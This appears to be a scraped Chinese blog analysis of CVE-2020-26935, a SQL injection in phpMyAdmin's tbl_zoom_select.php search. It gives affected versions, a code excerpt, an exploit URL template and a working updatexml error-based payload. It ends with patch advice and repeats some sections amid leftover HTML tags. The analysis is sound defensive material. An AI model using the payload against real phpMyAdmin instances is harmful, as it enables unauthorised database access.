CVE-2020-26935 phpMyAdmin后台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2>

CVE-2020-26935是phpMyAdmin中发现的一个SQL注入漏洞，影响版本为：<\/p>

phpMyAdmin 4.9.6之前的所有版本<\/li>

phpMyAdmin 5.x系列5.0.3之前的版本<\/li> <\/ul>

该漏洞存在于phpMyAdmin的搜索功能中，攻击者可以利用此漏洞在后台执行恶意SQL语句。<\/p>

漏洞分析<\/h2>

漏洞位置<\/h3>
漏洞位于`SearchController<\/code>中，具体在tbl_zoom_select.php<\/code>文件中调用了TableSearchController<\/code>的indexAction<\/code>方法。<\/p>`

漏洞触发条件<\/h3>

攻击者需要拥有phpMyAdmin的后台访问权限<\/li>
目标系统运行的是受影响版本的phpMyAdmin<\/li>
<\/ol>
漏洞原理<\/h3>
在tbl_zoom_select.php<\/code>中，当满足以下条件时会触发漏洞：<\/p>
if<\/span> (isset<\/span>($_REQUEST['get_data_row'<\/span>]) &&<\/span> $_REQUEST['get_data_row'<\/span>] ==<\/span> true<\/span>) {
<\/span><\/span>    $this-><\/span>getDataRowAction<\/span>();
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当请求中包含get_data_row<\/code>参数且值为true<\/code>时，会调用getDataRowAction<\/code>方法。该方法中直接使用用户输入的原生数据拼接SQL语句，没有进行适当的过滤或参数化处理，导致SQL注入漏洞。<\/p>
漏洞利用<\/h2>
利用方法<\/h3>
攻击者可以构造如下请求进行利用：<\/p>
http:\/\/[target]\/tbl_zoom_select.php?db=[database]&table=[table]&get_data_row=1&where_clause=[malicious_sql]
<\/code><\/pre>
利用示例<\/h3>
获取当前用户信息：<\/p>
http:\/\/127.0.0.1\/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
<\/code><\/pre>
这个payload利用了updatexml<\/code>函数和concat<\/code>函数来触发错误并显示当前用户信息。<\/p>
修复建议<\/h2>

升级到phpMyAdmin 4.9.6或更高版本<\/li>
升级到phpMyAdmin 5.0.3或更高版本<\/li>
如果无法立即升级，可以手动应用官方补丁<\/li>
<\/ol>
参考链接<\/h2>

CVE-2020-26935详情<\/a><\/li>
phpMyAdmin官方更新日志<\/li>
<\/ul>
总结<\/h2>
虽然该漏洞需要攻击者已经拥有后台访问权限，但它仍然可能被用于权限提升或数据泄露。建议所有phpMyAdmin用户及时更新到安全版本，以防止潜在的安全风险。<\/p>

CVE-2020-26935 phpMyAdmin后台SQL注入漏洞分析<\/h1>

漏洞分析<\/h2>

漏洞位置<\/h3> 漏洞位于SearchController<\/code>中，具体在tbl_zoom_select.php<\/code>文件中调用了TableSearchController<\/code>的indexAction<\/code>方法。<\/p>

总结<\/h2> 虽然该漏洞需要攻击者已经拥有后台访问权限，但它仍然可能被用于权限提升或数据泄露。建议所有phpMyAdmin用户及时更新到安全版本，以防止潜在的安全风险。<\/p>

漏洞位置<\/h3>
漏洞位于`SearchController<\/code>中，具体在tbl_zoom_select.php<\/code>文件中调用了TableSearchController<\/code>的indexAction<\/code>方法。<\/p>`

总结<\/h2>
虽然该漏洞需要攻击者已经拥有后台访问权限，但它仍然可能被用于权限提升或数据泄露。建议所有phpMyAdmin用户及时更新到安全版本，以防止潜在的安全风险。<\/p>